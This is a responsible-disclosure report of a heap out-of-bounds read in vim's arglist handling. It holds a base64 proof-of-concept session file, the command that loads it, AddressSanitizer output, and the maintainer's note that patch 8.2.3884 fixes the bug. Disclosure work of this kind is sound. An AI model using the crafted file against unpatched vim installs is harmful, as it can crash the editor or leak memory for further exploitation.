Out-of-bounds Read in vim/vim

Valid

Reported on

Dec 23rd 2021


Description

A heap-based OOB read of size 4 occurs when a user tries to open a vim session file specified below. This happens regarless of any command line options that could be specified to restrict vim, such -Z and -m. This bug has been found on default vim build in Ubuntu 20.04 for x86_64/amd64.

Proof of Concept

Steps to reproduce:

  1. Clone the repo and build with ASAN.

  2. Recreate POC session:

echo -ne "MDAwMDAwbjAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAgMDAwMDAwMCAwMDAwMCAwIDAwMDAwMDAgMDAwCmF1ISogMCBuMAphbA==" | base64 -d >  min_read_4

Its content is:

000000n0000000000000000000000000000000000000000000000 0000000 00000 0 0000000 000
au!* 0 n0
  1. Load session:
./vim -u NONE -i NONE -n -X -Z -e -m -s -S ./min_read_4 -c ':qa!'

Sanitizer output:

=================================================================
==4102472==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6070000003f8 at pc 0x00000049228a bp 0x7ffeb530bdd0 sp 0x7ffeb530bdc8
READ of size 4 at 0x6070000003f8 thread T0
    #0 0x492289 in alist_name /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:877:30
    #1 0x492289 in do_arg_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1138:23
    #2 0x492289 in ex_all /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:1188:5
    #3 0xcbcf56 in do_one_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:2572:2
    #4 0xcbcf56 in do_cmdline /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:994:17
    #5 0x1eb3e64 in do_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:1420:5
    #6 0x1ed7c97 in cmd_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:985:14
    #7 0x1ed7c97 in ex_source /home/octa/fuzzing_vim/vim_laf_asan/src/scriptfile.c:1011:2
    #8 0xcbcf56 in do_one_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:2572:2
    #9 0xcbcf56 in do_cmdline /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:994:17
    #10 0x2e24e95 in do_cmdline_cmd /home/octa/fuzzing_vim/vim_laf_asan/src/ex_docmd.c:588:12
    #11 0x2e24e95 in exe_commands /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:3084:2
    #12 0x2e24e95 in vim_main2 /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:775:6
    #13 0x2e13f06 in main /home/octa/fuzzing_vim/vim_laf_asan/src/main.c:426:12
    #14 0x7ff4cc80f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #15 0x3aa0bd in _start (/home/octa/fuzzing_vim/vim_laf_asan/src/vim+0x3aa0bd)

0x6070000003f8 is located 8 bytes to the right of 80-byte region [0x6070000003a0,0x6070000003f0)
allocated by thread T0 here:
    #0 0x424449 in realloc (/home/octa/fuzzing_vim/vim_laf_asan/src/vim+0x424449)
    #1 0x45fe4d in ga_grow_inner /home/octa/fuzzing_vim/vim_laf_asan/src/alloc.c:735:10

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/octa/fuzzing_vim/vim_laf_asan/src/arglist.c:877:30 in alist_name
Shadow bytes around the buggy address:
  0x0c0e7fff8020: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fd fd
  0x0c0e7fff8030: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
  0x0c0e7fff8040: fd fd fd fd fd fa fa fa fa fa fd fd fd fd fd fd
  0x0c0e7fff8050: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c0e7fff8060: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd
=>0x0c0e7fff8070: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa[fa]
  0x0c0e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==4102472==ABORTING

Impact

This vulnerability is capable disclosing data and might lead to bypass protection mechanisms facilitating successful exploitation of other memory corruption vulnerabilities that may lead to code execution.

Acknowledgements

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

We are processing your report and will contact the vim team within 24 hours. 9 months ago
We have contacted a member of the vim team and are waiting to hear back 9 months ago
Bram Moolenaar validated this vulnerability 9 months ago
Octavio Gianatiempo has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bram Moolenaar
9 months ago

Maintainer


I can reproduce the crash. I simplified the script a bit and turned it into a test. A fix is in patch 8.2.3884. The test gives a valgrind error before the patch.

Bram Moolenaar confirmed that a fix has been merged on 6f9837 9 months ago
Bram Moolenaar has been awarded the fix bounty
to join this conversation